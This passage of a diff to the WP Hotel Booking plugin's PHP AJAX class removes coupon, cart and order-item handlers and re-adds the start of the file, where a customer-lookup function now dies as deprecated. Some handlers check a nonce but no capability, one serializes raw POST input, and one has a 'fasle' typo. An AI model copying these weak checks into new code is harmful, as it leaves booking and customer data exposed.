-		if ( $posts = get_posts( $args ) ) {
-			$customer       = $posts[0];
-			$customer->data = array();
-			$data           = get_post_meta( $customer->ID );
-			foreach ( $data as $k => $v ) {
-				$customer->data[ $k ] = $v[0];
-			}
-		} else {
-			$customer = null;
-		}
-		hb_send_json( $customer );
-		die();
-	}
-
-	/**
-	 * Process the order with customer information posted via form
-	 *
-	 * @throws Exception
-	 */
-	static function place_order() {
-		hb_customer_place_order();
-	}
-
-	/**
-	 * Get all images for a room type
-	 */
-	static function load_room_type_galley() {
-		$term_id        = hb_get_request( 'term_id' );
-		$attachment_ids = get_option( 'hb_taxonomy_thumbnail_' . $term_id );
-		$attachments    = array();
-		if ( $attachment_ids ) {
-			foreach ( $attachment_ids as $id ) {
-				$attachment    = wp_get_attachment_image_src( $id, 'thumbnail' );
-				$attachments[] = array(
-					'id'  => $id,
-					'src' => $attachment[0],
-				);
-			}
-		}
-		hb_send_json( $attachments );
-	}
-
-	/**
-	 * Catch variables via post method and build a request param
-	 */
-	static function parse_search_params() {
-		check_ajax_referer( 'hb_search_nonce_action', '_nonce' );
-		$params = array(
-			'hotel-booking'     => hb_get_request( 'hotel-booking' ),
-			'check_in_date'     => hb_get_request( 'check_in_date' ),
-			'check_out_date'    => hb_get_request( 'check_out_date' ),
-			'hb_check_in_date'  => hb_get_request( 'hb_check_in_date' ),
-			'hb_check_out_date' => hb_get_request( 'hb_check_out_date' ),
-			'adults'            => hb_get_request( 'adults_capacity' ),
-			'max_child'         => hb_get_request( 'max_child' ),
-		);
-
-		$return = apply_filters(
-			'hotel_booking_parse_search_param',
-			array(
-				'success' => 1,
-				'sig'     => base64_encode( wp_json_encode( $params ) ),
-				'params'  => $params,
-			)
-		);
-		hb_send_json( $return );
-	}
-
-	static function apply_coupon() {
-		! session_id() && session_start( array( 'read_and_close' => true ) );
-		$code = hb_get_request( 'code' );
-		if ( empty( hb_get_request( 'nonce', false ) )
-			|| ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {
-			wp_die( __( 'Require Nonce!', 'wp-hotel-booking' ) );
-		}
-		ob_start();
-		$today  = strtotime( date( 'm/d/Y' ) );
-		$coupon = hb_get_coupons_active( $today, $code );
-
-		$output   = ob_get_clean();
-		$response = array();
-		if ( $coupon ) {
-			$coupon   = HB_Coupon::instance( $coupon );
-			$response = $coupon->validate();
-			if ( $response['is_valid'] ) {
-				$response['result'] = 'success';
-				$response['type']   = get_post_meta( $coupon->ID, '_hb_coupon_discount_type', true );
-				$response['value']  = get_post_meta( $coupon->ID, '_hb_coupon_discount_value', true );
-				// set session
-				WP_Hotel_Booking::instance()->cart->set_customer( 'coupon', $coupon->post->ID );
-				hb_add_message( __( 'Coupon code applied', 'wp-hotel-booking' ) );
-			}
-		} else {
-			$response['message'] = __( 'Coupon does not exist!', 'wp-hotel-booking' );
-		}
-		hb_send_json(
-			$response
-		);
-	}
-
-	static function remove_coupon() {
-		! session_id() && session_start( array( 'read_and_close' => true ) );
-		// delete_transient( 'hb_user_coupon_' . session_id() );
-		WP_Hotel_Booking::instance()->cart->set_customer( 'coupon', null );
-		hb_add_message( __( 'Coupon code removed', 'wp-hotel-booking' ) );
-		hb_send_json(
-			array(
-				'result' => 'success',
-			)
-		);
-	}
-
-	static function parse_booking_params() {
-
-		check_ajax_referer( 'hb_booking_nonce_action', 'nonce' );
-
-		$check_in     = hb_get_request( 'check_in_date' );
-		$check_out    = hb_get_request( 'check_out_date' );
-		$num_of_rooms = hb_get_request( 'hb-num-of-rooms' );
-
-		$params = array(
-			'hotel-booking'   => hb_get_request( 'hotel-booking' ),
-			'check_in_date'   => $check_in,
-			'check_out_date'  => $check_out,
-			'hb-num-of-rooms' => $num_of_rooms,
-		);
-
-		// print_r($params);
-		hb_send_json(
-			array(
-				'success' => 1,
-				'sig'     => base64_encode( serialize( $params ) ),
-			)
-		);
-	}
-
-	static function ajax_add_to_cart() {
-		$res = new WPHB_REST_Response();
-
-		try {
-			if ( ! check_ajax_referer( 'hb_booking_nonce_action', 'nonce' ) ) {
-				throw new Exception( __( 'Invalid request', 'wp-hotel-booking' ) );
-			}
-
-			$qty            = WPHB_Helpers::get_param( 'hb-num-of-rooms', 1, 'int' );
-			$room_id        = WPHB_Helpers::get_param( 'room-id', 0, 'int' );
-			$check_in_date  = WPHB_Helpers::get_param( 'check_in_date' );
-			$check_out_date = WPHB_Helpers::get_param( 'check_out_date' );
-			$adult_qty      = WPHB_Helpers::get_param( 'adult_qty', 1, 'int' );
-			$child_qty      = WPHB_Helpers::get_param( 'child_qty', 0, 'int' );
-
-			$from_check_dates_room = WPHB_Helpers::get_param( 'from-check-dates-room', 0, 'int' );
-
-			if ( ! $room_id ) {
-				throw new Exception( __( 'Room ID is invalid.', 'wp-hotel-booking' ) );
-			}
-
-			$room = get_post( $room_id );
-			if ( ! $room || ! is_a( $room, 'WP_POST' ) || $room->post_type != 'hb_room' ) {
-				throw new Exception( __( 'Room ID is not exists.', 'wp-hotel-booking' ) );
-			}
-
-			$available_qty = hotel_booking_get_room_available(
-				$room_id,
-				array(
-					'check_in_date'  => $check_in_date,
-					'check_out_date' => $check_out_date,
-				)
-			);
-			if ( is_wp_error( $available_qty ) ) {
-				throw new Exception( $available_qty->get_error_message() );
-			} elseif ( $qty > $available_qty ) {
-				$message = sprintf( __( 'You can only book up to %d rooms' ), $available_qty );
-				throw new Exception( $message );
-			}
-
-			// Add to cart
-			$params = array(
-				'product_id'     => $room_id,
-				'check_in_date'  => $check_in_date,
-				'check_out_date' => $check_out_date,
-				'adult_qty'      => $adult_qty,
-				'child_qty'      => $child_qty,
-			);
-
-			$cart_item_id = WP_Hotel_Booking::instance()->cart->add_to_cart( $room_id, $params, $qty );
-			if ( ! is_wp_error( $cart_item_id ) ) {
-				$cart_item    = WP_Hotel_Booking::instance()->cart->get_cart_item( $cart_item_id );
-				$room         = $cart_item->product_data;
-				$pageRedirect = WPHB_Settings::instance()->getPageRedirect();
-
-				// Check to add extra
-				$hb_optional_quantity_selected = WPHB_Helpers::get_param( 'hb_optional_quantity_selected', [] );
-				$hb_optional_quantity = WPHB_Helpers::get_param( 'hb_optional_quantity', [] );
-				if ( ! empty( $hb_optional_quantity_selected ) && ! empty( $hb_optional_quantity ) && $cart_item ) {
-					$extra_cart = HB_Extra_Cart::instance();
-					foreach ( $hb_optional_quantity_selected as $extra_id => $select ) {
-						$extra_cart->ajax_added_cart(
-							$cart_item_id,
-							array(
-								'product_id'                    => $room_id,
-								'hb_optional_quantity'          => array( $extra_id => $hb_optional_quantity[ $extra_id ] ),
-								'hb_optional_quantity_selected' => array( $extra_id => 'on' ),
-								'check_in_date'                 => $check_in_date,
-								'check_out_date'                => $check_out_date,
-							)
-						);
-					}
-				}
-				$res->data->redirect = $pageRedirect;
-
-				$res->status  = 'success';
-				$res->message = sprintf( '<label class="hb_success_message">%1$s</label>', __( 'Added successfully.', 'wp-hotel-booking' ) );
-			} else {
-				throw new $cart_item_id->get_error_message();
-			}
-		} catch ( Throwable $e ) {
-			$res->message = $e->getMessage();
-		}
-
-		wp_send_json( $res );
-	}
-
-	// remove cart item
-	static function ajax_remove_item_cart() {
-		if ( ! check_ajax_referer( 'hb_booking_nonce_action', 'nonce' ) ) {
-			return;
-		}
-
-		$cart = WP_Hotel_Booking::instance()->cart;
-
-		if ( empty( $cart->cart_contents ) || ! isset( $_POST['cart_id'] ) || ! array_key_exists( sanitize_text_field( wp_unslash( $_POST['cart_id'] ) ), $cart->cart_contents ) ) {
-			hb_send_json(
-				array(
-					'status'  => 'warning',
-					'message' => __( 'Cart item is not exists.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-
-		if ( $cart->remove_cart_item( sanitize_text_field( wp_unslash( $_POST['cart_id'] ) ) ) ) {
-			$return = apply_filters(
-				'hotel_booking_ajax_remove_cart_item',
-				array(
-					'status'          => 'success',
-					'sub_total'       => hb_format_price( $cart->sub_total ),
-					'grand_total'     => hb_format_price( $cart->total ),
-					'advance_payment' => hb_format_price( $cart->advance_payment ),
-				)
-			);
-
-			hb_send_json( $return );
-		}
-	}
-
-	// ajax load user in booking details
-	static function load_order_user() {
-		if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_key( $_POST['nonce'] ), 'hb_booking_nonce_action' ) || ! isset( $_POST['user_name'] ) ) {
-			return;
-		}
-
-		if ( ! current_user_can( 'administrator' ) ) {
-			return;
-		}
-
-		$user_name = sanitize_text_field( wp_unslash( $_POST['user_name'] ) );
-		global $wpdb;
-		$sql = $wpdb->prepare(
-			"
-				SELECT user.ID, user.user_email, user.user_login FROM $wpdb->users AS user
-				WHERE
-					user.user_login LIKE %s
-			",
-			'%' . $wpdb->esc_like( $user_name ) . '%'
-		);
-
-		$users = $wpdb->get_results( $sql );
-		wp_send_json( $users );
-		die();
-	}
-
-	// ajax load room in booking details
-	static function load_room_ajax() {
-		if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_key( $_POST['nonce'] ), 'hb_booking_nonce_action' ) || ! isset( $_POST['room'] ) ) {
-			return;
-		}
-
-		$title = sanitize_text_field( $_POST['room'] );
-		global $wpdb;
-		$sql = $wpdb->prepare(
-			"
-				SELECT room.ID AS ID, room.post_title AS post_title FROM $wpdb->posts AS room
-				WHERE
-					room.post_title LIKE %s
-					AND room.post_type = %s
-					AND room.post_status = %s
-					GROUP BY room.post_name
-			",
-			'%' . $wpdb->esc_like( $title ) . '%',
-			'hb_room',
-			'publish'
-		);
-
-		$rooms = $wpdb->get_results( $sql );
-		wp_send_json( $rooms );
-		die();
-	}
-
-	// ajax check available room in booking details
-	static function check_room_available() {
-
-		if ( ! isset( $_POST['hotel-admin-check-room-available'] ) || ! wp_verify_nonce( sanitize_key( $_POST['hotel-admin-check-room-available'] ), 'hotel_admin_check_room_available' ) ) {
-			return;
-		}
-
-		// hotel_booking_get_room_available
-		if ( ! isset( $_POST['product_id'] ) || ! $_POST['product_id'] ) {
-			wp_send_json(
-				array(
-					'status'  => false,
-					'message' => __( 'Room not found.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-
-		if ( ! isset( $_POST['check_in_date_timestamp'] ) || ! isset( $_POST['check_out_date_timestamp'] ) ) {
-			wp_send_json(
-				array(
-					'status'  => false,
-					'message' => __( 'Please select check in date and checkout date.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-
-		$product_id = absint( $_POST['product_id'] );
-		$qty        = hotel_booking_get_room_available(
-			$product_id,
-			array(
-				'check_in_date'  => sanitize_text_field( wp_unslash( $_POST['check_in_date_timestamp'] ) ),
-				'check_out_date' => sanitize_text_field( wp_unslash( $_POST['check_out_date_timestamp'] ) ),
-			)
-		);
-
-		if ( $qty && ! is_wp_error( $qty ) ) {
-
-			// HB_Room_Extra instead of HB_Room
-			$room_extra = HB_Room_Extra::instance( $product_id );
-
-			$room_extra = $room_extra->get_extra();
-
-			$args = apply_filters(
-				'hotel_booking_check_room_available',
-				array(
-					'status'       => true,
-					'qty'          => $qty,
-					'qty_selected' => isset( $_POST['order_item_id'] ) ? hb_get_order_item_meta( $_POST['order_item_id'], 'qty', true ) : 0,
-					'product_id'   => $product_id,
-					'extra'        => $room_extra,
-				)
-			);
-			wp_send_json( $args );
-		} else {
-			wp_send_json(
-				array(
-					'status'  => false,
-					'message' => $qty->get_error_message(),
-				)
-			);
-		}
-	}
-
-	// ajax load oder item to edit
-	static function load_order_item() {
-		if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_key( $_POST['nonce'] ), 'hb_booking_nonce_action' ) ) {
-			return;
-		}
-
-		if ( ! isset( $_POST['order_item_id'] ) ) {
-			wp_send_json( array() );
-		}
-
-		$order_id      = isset( $_POST['order_id'] ) ? absint( $_POST['order_id'] ) : 0;
-		$order_item_id = absint( $_POST['order_item_id'] );
-		$product_id    = hb_get_order_item_meta( $order_item_id, 'product_id', true );
-		$checkin       = hb_get_order_item_meta( $order_item_id, 'check_in_date', true );
-		$checkout      = hb_get_order_item_meta( $order_item_id, 'check_out_date', true );
-
-		// extra hook
-		$args = apply_filters(
-			'hotel_booking_admin_load_order_item',
-			array(
-				'status'                   => true,
-				'modal_title'              => __( 'Edit order item', 'wp-hotel-booking' ),
-				'order_id'                 => $order_id,
-				'order_item_id'            => $order_item_id,
-				'product_id'               => $product_id,
-				'room'                     => array(
-					'ID'         => $product_id,
-					'post_title' => get_the_title( hb_get_order_item_meta( $order_item_id, 'product_id', true ) ),
-				),
-				'check_in_date'            => date_i18n( hb_get_date_format(), $checkin ),
-				'check_out_date'           => date_i18n( hb_get_date_format(), $checkout ),
-				'check_in_date_timestamp'  => $checkin,
-				'check_out_date_timestamp' => $checkout,
-				'qty'                      => hotel_booking_get_room_available(
-					$product_id,
-					array(
-						'check_in_date'  => $checkin,
-						'check_out_date' => $checkout,
-						'excerpt'        => array( $order_id ),
-					)
-				),
-				'qty_selected'             => hb_get_order_item_meta( $order_item_id, 'qty', true ),
-				'post_type'                => get_post_type( $product_id ),
-			)
-		);
-		wp_send_json( $args );
-	}
-
-	// ajax load coupons code
-	static function load_coupon_ajax() {
-		if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_key( $_POST['nonce'] ), 'hb_booking_nonce_action' ) ) {
-			return;
-		}
-
-		$code = sanitize_text_field( wp_unslash( $_POST['coupon'] ) );
-		$time = time();
-
-		global $wpdb;
-		$sql = $wpdb->prepare(
-			"
-				SELECT coupon.ID, coupon.post_title FROM $wpdb->posts AS coupon
-					INNER JOIN $wpdb->postmeta AS start ON start.post_id = coupon.ID
-					INNER JOIN $wpdb->postmeta AS end ON end.post_id = coupon.ID
-				WHERE
-					coupon.post_type = %s
-					AND coupon.post_title LIKE %s
-					AND coupon.post_status = %s
-					AND start.meta_key = %s
-					AND end.meta_key = %s
-					AND ( start.meta_value <= %d AND end.meta_value >= %d )
-			",
-			'hb_coupon',
-			'%' . $wpdb->esc_like( $code ) . '%',
-			'publish',
-			'_hb_coupon_date_from_timestamp',
-			'_hb_coupon_date_to_timestamp',
-			$time,
-			$time
-		);
-
-		wp_send_json( apply_filters( 'hotel_admin_get_coupons', $wpdb->get_results( $sql ) ) );
-	}
-
-	// book mamunal add order item
-	static function admin_add_order_item() {
-		$result = array(
-			'status'  => false,
-			'message' => __( 'Something when wrong!', 'wp-hotel-booking' ),
-		);
-
-		if ( ! current_user_can( 'administrator' )
-			&& ! current_user_can( 'wphb_hotel_manager' )
-			&& ! current_user_can( 'wphb_booking_editor' ) ) {
-			$result['message'] = __( 'Request not valid', 'wp-hotel-booking' );
-			wp_send_json( $result );
-		}
-
-		if ( ! isset( $_POST['hotel-admin-check-room-available'] ) || ! wp_verify_nonce( sanitize_key( $_POST['hotel-admin-check-room-available'] ), 'hotel_admin_check_room_available' ) ) {
-			$result['message'] = __( 'nonce is invalid', 'wp-hotel-booking' );
-			wp_send_json( $result );
-		}
-
-		if ( ! isset( $_POST['check_in_date_timestamp'] ) || ! isset( $_POST['check_out_date_timestamp'] ) ) {
-			$result['message'] = __( 'Date check-in or date check-out is invalid', 'wp-hotel-booking' );
-			wp_send_json( $result );
-		}
-
-		$order_id       = isset( $_POST['order_id'] ) ? absint( $_POST['order_id'] ) : 0;
-		$product_id     = isset( $_POST['product_id'] ) ? absint( $_POST['product_id'] ) : 0;
-		$qty            = isset( $_POST['qty'] ) ? absint( $_POST['qty'] ) : 0;
-		$check_in_date  = absint( $_POST['check_in_date_timestamp'] );
-		$check_out_date = absint( $_POST['check_out_date_timestamp'] );
-
-		// Check room exist
-		$room = get_post( $product_id );
-
-		if ( ! is_a( $room, 'WP_POST' ) || ! isset( $room ) || $room->post_type != 'hb_room' ) {
-			$result['message'] = __( 'Id room is invalid', 'wp-hotel-booking' );
-			wp_send_json( $result );
-		}
-
-		if ( ! $qty ) {
-			$result['message'] = __( 'Can not add item with zero quantity.', 'wp-hotel-booking' );
-			wp_send_json( $result );
-		}
-
-		$order_item_id = 0;
-		if ( isset( $_POST['order_item_id'] ) && $_POST['order_item_id'] ) {
-			$order_item_id = absint( $_POST['order_item_id'] );
-		}
-
-		$args = array(
-			'order_item_name'   => get_the_title( $product_id ),
-			'order_item_type'   => isset( $_POST['order_item_type'] ) && $_POST['order_item_type'] ? sanitize_title( $_POST['order_item_type'] ) : 'line_item',
-			'order_item_parent' => isset( $_POST['order_item_parent'] ) && $_POST['order_item_parent'] ? absint( $_POST['order_item_parent'] ) : null,
-		);
-		if ( ! $order_item_id ) {
-			// add new order item
-			$order_item_id = hb_add_order_item( $order_id, $args );
-		} else {
-			// update order item
-			hb_update_order_item( $order_item_id, $args );
-		}
-
-		// update order item meta
-		hb_update_order_item_meta( $order_item_id, 'product_id', $product_id );
-		hb_update_order_item_meta( $order_item_id, 'check_in_date', $check_in_date );
-		hb_update_order_item_meta( $order_item_id, 'check_out_date', $check_out_date );
-		hb_update_order_item_meta( $order_item_id, 'qty', $qty );
-
-		// Addition package
-		if ( isset( $_POST['sub_items'] ) ) {
-			hb_update_order_item_meta( $order_item_id, 'addition_package_items', serialize( $_POST['sub_items'] ) );
-		}
-
-		$params        = array(
-			'check_in_date'  => $check_in_date,
-			'check_out_date' => $check_out_date,
-			'quantity'       => $qty,
-			'order_item_id'  => $order_item_id,
-		);
-		$product_class = hotel_booking_get_product_class( $product_id, $params );
-
-		// update subtotal, total
-		$subtotal = $product_class->amount_exclude_tax();
-		$total    = $product_class->amount_include_tax();
-		hb_update_order_item_meta( $order_item_id, 'subtotal', $subtotal );
-		hb_update_order_item_meta( $order_item_id, 'total', $total );
-		hb_update_order_item_meta( $order_item_id, 'tax_total', $total - $subtotal );
-
-		// allow hook
-		do_action( 'hotel_booking_updated_order_item', $order_id, $order_item_id );
-
-		$post = get_post( $order_id );
-
-		// update booking info meta post
-		WPHB_Booking::instance( $order_id )->update_room_booking( $order_id );
-
-		ob_start();
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items.php';
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items-template-js.php';
-		$html = ob_get_clean();
-		wp_send_json(
-			array(
-				'status' => true,
-				'html'   => $html,
-			)
-		);
-	}
-
-	// remove order item
-	static function admin_remove_order_item() {
-		// verify nonce
-		if ( ! check_ajax_referer( 'hotel-booking-confirm', 'hotel_booking_confirm' ) ) {
-			return;
-		}
-
-		$order_item_id = isset( $_POST['order_item_id'] ) ? absint( $_POST['order_item_id'] ) : 0;
-		$order_id      = isset( $_POST['order_id'] ) ? absint( $_POST['order_id'] ) : 0;
-		if ( $order_item_id ) {
-			hb_remove_order_item( $order_item_id );
-
-			$post = get_post( $order_id );
-			ob_start();
-			require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items.php';
-			require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items-template-js.php';
-			$html = ob_get_clean();
-			wp_send_json(
-				array(
-					'status' => true,
-					'html'   => $html,
-				)
-			);
-		}
-	}
-
-	// remove list order items
-	static function admin_remove_order_items() {
-		// verify nonce
-		if ( ! check_ajax_referer( 'hotel-booking-confirm', 'hotel_booking_confirm' ) ) {
-			return;
-		}
-
-		$order_id = isset( $_POST['order_id'] ) ? absint( $_POST['order_id'] ) : 0;
-
-		if ( isset( $_POST['order_item_id'] ) && is_array( $_POST['order_item_id'] ) ) {
-			foreach ( $_POST['order_item_id'] as $key => $o_i_d ) {
-				$o_i_d = absint( $o_i_d );
-				hb_remove_order_item( $o_i_d );
-			}
-		}
-
-		$post = get_post( $order_id );
-		ob_start();
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items.php';
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items-template-js.php';
-		$html = ob_get_clean();
-		wp_send_json(
-			array(
-				'status' => true,
-				'html'   => $html,
-			)
-		);
-	}
-
-	// add new coupon
-	static function add_coupon_to_order() {
-		if ( ! check_ajax_referer( 'hotel_admin_get_coupon_available', 'hotel-admin-get-coupon-available' ) || ! class_exists( 'HB_Coupon' ) ) {
-			return;
-		}
-
-		if ( ! isset( $_POST['order_id'] ) || ! isset( $_POST['coupon_id'] ) ) {
-			return;
-		}
-
-		$order_id  = absint( $_POST['order_id'] );
-		$coupon_id = absint( $_POST['coupon_id'] );
-
-		$coupon   = HB_Coupon::instance( $coupon_id );
-		$subtotal = hb_booking_subtotal( $order_id, false ); // subtotal without coupon
-
-		add_post_meta( $order_id, '_hb_coupon_id', $coupon_id );
-		add_post_meta( $order_id, '_hb_coupon_code', $coupon->coupon_code );
-		add_post_meta( $order_id, '_hb_coupon_value', $coupon->get_discount_value( $subtotal ) );
-
-		$post = get_post( $order_id );
-		ob_start();
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items.php';
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items-template-js.php';
-		$html = ob_get_clean();
-		wp_send_json(
-			array(
-				'status' => true,
-				'html'   => $html,
-			)
-		);
-	}
-
-	// remove coupon order
-	static function remove_coupon_on_order() {
-		if ( ! check_ajax_referer( 'hotel-booking-confirm', 'hotel_booking_confirm' ) ) {
-			return;
-		}
-
-		if ( ! isset( $_POST['order_id'] ) || ! isset( $_POST['coupon_id'] ) ) {
-			return;
-		}
-
-		$order_id = absint( $_POST['order_id'] );
-
-		delete_post_meta( $order_id, '_hb_coupon_id' );
-		delete_post_meta( $order_id, '_hb_coupon_code' );
-		delete_post_meta( $order_id, '_hb_coupon_value' );
-
-		$post = get_post( $order_id );
-		ob_start();
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items.php';
-		require_once WPHB_PLUGIN_PATH . '/includes/admin/metaboxes/views/meta-booking-items-template-js.php';
-		$html = ob_get_clean();
-		wp_send_json(
-			array(
-				'status' => true,
-				'html'   => $html,
-			)
-		);
-	}
-
-	static function load_other_full_calendar() {
-		check_ajax_referer( 'hb_booking_nonce_action', 'nonce' );
-
-		if ( ! isset( $_POST['room_id'] ) ) {
-			wp_send_json(
-				array(
-					'status'  => fasle,
-					'message' => __( 'Room is not exists.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-
-		$room_id = absint( $_POST['room_id'] );
-		if ( ! isset( $_POST['date'] ) ) {
-			wp_send_json(
-				array(
-					'status'  => fasle,
-					'message' => __( 'Date is not exists.', 'wp-hotel-booking' ),
-				)
-			);
-		}
-		$date = sanitize_text_field( wp_unslash( $_POST['date'] ) );
-
-		wp_send_json(
-			array(
-				'status'     => true,
-				'events'     => hotel_booking_print_pricing_json( $room_id, date( 'm/d/Y', strtotime( $date ) ) ),
-				'next'       => date( 'm/d/Y', strtotime( '+1 month', strtotime( $date ) ) ),
-				'prev'       => date( 'm/d/Y', strtotime( '-1 month', strtotime( $date ) ) ),
-				'month_name' => date_i18n( 'F, Y', strtotime( $date ) ),
-			)
-		);
-	}
-}
-
-new WPHB_Ajax();
+<?php
+/**
+ * WP Hotel Booking ajax.
+ *
+ * @version       1.9.6
+ * @author        ThimPress
+ * @package       WP_Hotel_Booking/Classes
+ * @category      Classes
+ * @author        Thimpress, leehld
+ */
+
+/**
+ * Prevent loading this file directly
+ */
+defined( 'ABSPATH' ) || exit;
+
+/**
+ * Class WPHB_Ajax
+ */
+class WPHB_Ajax {
+
+	/**
+	 * @var bool
+	 */
+	protected static $_loaded = false;
+
+	/**
+	 * Constructor
+	 */
+	function __construct() {
+		if ( self::$_loaded ) {
+			return;
+		}
+
+		$ajax_actions = array(
+			//'fetch_customer_info'      => true,
+			'place_order'              => true,
+			'load_room_type_galley'    => false,
+			'parse_search_params'      => true,
+			'parse_booking_params'     => true,
+			'apply_coupon'             => true,
+			'remove_coupon'            => true,
+			'ajax_add_to_cart'         => true,
+			'add_extra_to_cart'        => true,
+			'ajax_remove_item_cart'    => true,
+			'load_order_user'          => false,
+			'load_room_ajax'           => false,
+			'check_room_available'     => false,
+			'load_order_item'          => false,
+			'load_coupon_ajax'         => false,
+			'admin_add_order_item'     => false,
+			'admin_remove_order_item'  => false,
+			'admin_remove_order_items' => false,
+			'add_coupon_to_order'      => false,
+			'remove_coupon_on_order'   => false,
+			'load_other_full_calendar' => false,
+			'dismiss_notice'           => true,
+			'create_pages'             => false,
+		);
+
+		foreach ( $ajax_actions as $action => $priv ) {
+			add_action( "wp_ajax_hotel_booking_{$action}", array( __CLASS__, $action ) );
+			if ( $priv ) {
+				add_action( "wp_ajax_nopriv_hotel_booking_{$action}", array( __CLASS__, $action ) );
+			}
+		}
+		self::$_loaded = true;
+	}
+
+	/**
+	 * It creates a page
+	 */
+	static function create_pages() {
+		$response = array(
+			'code'    => 0,
+			'message' => '',
+		);
+
+		if ( ! current_user_can( 'edit_pages' ) || empty( $_POST['page_name'] ) ) {
+			$response['message'] = __( 'Request invalid', 'wp-hotel-booking' );
+			hb_send_json( $response );
+		}
+
+		$page_name = WPHB_Helpers::sanitize_params_submitted( $_POST['page_name'] );
+
+		if ( $page_name ) {
+			$args = array(
+				'post_type'   => 'page',
+				'post_title'  => $page_name,
+				'post_status' => 'publish',
+			);
+
+			$page_id = wp_insert_post( $args );
+
+			if ( $page_id ) {
+				$response['code']    = 1;
+				$response['message'] = 'create page success';
+				$response['page']    = get_post( $page_id );
+				$response['html']    = '<a href="' . get_edit_post_link( $page_id ) . '" target="_blank">' . __( 'Edit Page', 'wp-hotel-booking' ) . '</a> ';
+				$response['html']   .= '<a href="' . get_permalink( $page_id ) . '" target="_blank">' . __( 'View Page', 'wp-hotel-booking' ) . '</a>';
+			} else {
+				$response['error'] = __( 'Error! Page creation failed. Please try again.', 'wp-hotel-booking' );
+			}
+		} else {
+			$response['error'] = __( 'Empty page name!', 'wp-hotel-booking' );
+		}
+
+		wp_send_json( $response );
+		die;
+	}
+
+	/**
+	 * Add extra to cart action.
+	 */
+	public static function add_extra_to_cart() {
+
+		if ( ! check_ajax_referer( 'hb_select_extra_nonce_action', 'nonce' ) ) {
+			return;
+		}
+
+		$cart_id = sanitize_text_field( wp_unslash( $_POST['cart_id'] ) );
+		if ( ! $cart_id ) {
+			hb_send_json(
+				array(
+					'status'  => 'warning',
+					'message' => __( 'Cart ID is invalid.', 'wp-hotel-booking' ),
+				)
+			);
+		}
+
+		$cart       = WPHB_Cart::instance();
+		$extra_cart = HB_Extra_Cart::instance();
+		$cart_item  = $cart->get_cart_item( $cart_id );
+
+		if ( isset( $_POST['hb_optional_quantity_selected'] ) ) {
+			$selected  = WPHB_Helpers::sanitize_params_submitted( $_POST['hb_optional_quantity_selected'] );
+			$extra_qty = WPHB_Helpers::sanitize_params_submitted( $_POST['hb_optional_quantity'] );
+
+			foreach ( $selected as $extra_id => $select ) {
+				if ( $select == 'on' && $cart_item ) {
+					$extra_cart->ajax_added_cart(
+						$cart_id,
+						array(
+							'hb_optional_quantity' => array( $extra_id => $extra_qty[ $extra_id ] ),
+							'hb_optional_quantity_selected' => array( $extra_id => 'on' ),
+						),
+					);
+				}
+			}
+		}
+		$cart_url = hb_get_cart_url();
+
+		$pageRedirect = WPHB_Settings::instance()->getPageRedirect();
+
+		if ( $pageRedirect == '' ) {
+			$pageRedirect = $cart_url;
+		}
+
+		hb_send_json(
+			array(
+				'status'   => 'success',
+				'redirect' => $pageRedirect,
+			)
+		);
+	}
+
+
+	/**
+	 * Dismiss remove TP Hotel Booking plugin notice
+	 */
+	static function dismiss_notice() {
+		if ( empty( hb_get_request( 'nonce', false ) )
+			|| ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {
+			wp_die();
+		}
+
+		if ( is_multisite() ) {
+			update_site_option( 'wphb_notice_remove_hotel_booking', 1 );
+		} else {
+			update_option( 'wphb_notice_remove_hotel_booking', 1 );
+		}
+		wp_send_json(
+			array(
+				'status' => 'done',
+			)
+		);
+	}
+
+	/**
+	 * Fetch customer information with user email
+	 * @deprecated 2.2.8
+	 */
+	static function fetch_customer_info() {
+		_deprecated_function( __METHOD__, '2.2.8' );
+		die();
+		check_ajax_referer( 'wphb_get_customer_info' );
+		$email = hb_get_request( 'email' );
+		$args  = array(
+			'post_type'   => 'hb_booking',
+			'meta_key'    => '_hb_customer_email',
+			'meta_value'  => $email,
+			'post_status' => 'any',
+		);
+		// set_transient( 'hotel_booking_customer_email_' . WPHB_BLOG_ID, $email, DAY_IN_SECONDS );
+		WP_Hotel_Booking::instance()->cart->set_customer( 'customer_email', $email );
+		if ( $posts = get_posts( $args ) ) {
+			$customer       = $posts[0];
+			$customer->data = array();
+			$data           = get_post_meta( $customer->ID );
+			foreach ( $data as $k => $v ) {
+				$customer->data[ $k ] = $v[0];
+			}
+		} else {
+			$customer = null;
+		}
+		hb_send_json( $customer );
+		die();
+	}
+
+	/**
+	 * Process the order with customer information posted via form
+	 *
+	 * @throws Exception
+	 */
+	static function place_order() {
+		hb_customer_place_order();
+	}
+
+	/**
+	 * Get all images for a room type
+	 */
+	static function load_room_type_galley() {
+		$term_id        = hb_get_request( 'term_id' );
+		$attachment_ids = get_option( 'hb_taxonomy_thumbnail_' . $term_id );
+		$attachments    = array();
+		if ( $attachment_ids ) {
+			foreach ( $attachment_ids as $id ) {
+				$attachment    = wp_get_attachment_image_src( $id, 'thumbnail' );
+				$attachments[] = array(
+					'id'  => $id,
+					'src' => $attachment[0],
+				);
+			}
+		}
+		hb_send_json( $attachments );
+	}
+
+	/**
+	 * Catch variables via post method and build a request param
+	 */
+	static function parse_search_params() {
+		check_ajax_referer( 'hb_search_nonce_action', '_nonce' );
+		$params = array(
+			'hotel-booking'     => hb_get_request( 'hotel-booking' ),
